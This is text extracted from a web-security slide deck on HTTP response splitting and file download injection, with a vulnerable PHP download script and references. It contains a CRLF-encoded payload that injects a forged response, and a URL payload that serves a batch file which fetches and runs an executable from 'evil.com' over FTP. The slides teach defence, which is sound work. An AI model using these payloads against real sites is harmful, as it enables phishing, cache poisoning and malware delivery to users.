Beruflich Dokumente
Kultur Dokumente
/redir_lang.jsp?lang=foobar%0d%0aContent-
Length:%200%0d%0a%0d%0aHTTP/
1.1%20200%20OK%0d%0aContent-
Type:%20text/html%0d%0aContent-
Length:%2019%0d%0a%0d
%0a<html>Shazam</html>
HTTP/1.1 302 Moved Temporarily
Date: Wed, 24 Dec 2003 15:26:41 GMT
Location: http://10.1.1.1/by_lang.jsp?lang=foobar
Content-Length: 0
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 19
<html>Shazam</html>
Server: WebLogic XMLX Module 8.1 SP1 Fri Jun 20 23:06:40 PDT
2003 271009 with
Content-Type: text/html
Set-Cookie:
JSESSIONID=1pwxbgHwzeaIIFyaksxqsq92Z0VULcQUcAanfK7In7IyrCST9Us
S!-1251019693; path=/
Connection: Close
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 19
<html>Shazam</html>">http://10.1.1.1/by_lang.jsp?l
ang=foobar
Content-Length: 0
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 19
<html>Shazam</html></a>.</p>
</body></html>
Why?
• Cache Poisoning
• Replace content
• Phishing
• XSS
• etc.
File Download Injection
An similar idea to
response splitting
We've all written
download scripts:
download.php?file=report.xls
$filename = basename($_GET["download"]);
header('Content-Disposition: attachment; filename="' . $filename . '"');
readfile(basename($_GET["download"]));
return;
http://[trusted_domain]/download.php?file=attack.bat%0d
%0a%0d%0aecho%20get%20/pub/winzip/wzinet95.exe|ftp%20-A
%20evil.com%0d%0awzinet95.exe
HTTP/1.1 200 OK
Date: Thu, 27 Mar 2008 05:02:24 GMT
Server: Apache
Path=/download
Content-Disposition: attachment;filename=attack.bat
Content-length: 88
Sensitive stuff in
separate browser?
As a programmer:
Whitelist everything.
Nothing gets through
w/o you knowing
As a programmer:
• http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf
• http://packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf
• http://lists.grok.org.uk/pipermail/full-disclosure/2006-February/042358.html
• http://www.webappsec.org/lists/websecurity/archive/2008-04/msg00003.html
• http://www.aspectsecurity.com/documents/Aspect_File_Download_Injection.pdf
• http://www.breakingpointsystems.com/community/blog/clickjacking
• http://en.wikipedia.org/wiki/Cross-site_request_forgery
• http://www.davidairey.com/google-gmail-security-hijack/
• http://www.cyberciti.biz/tips/firefox-stop-clickjacking-attack.html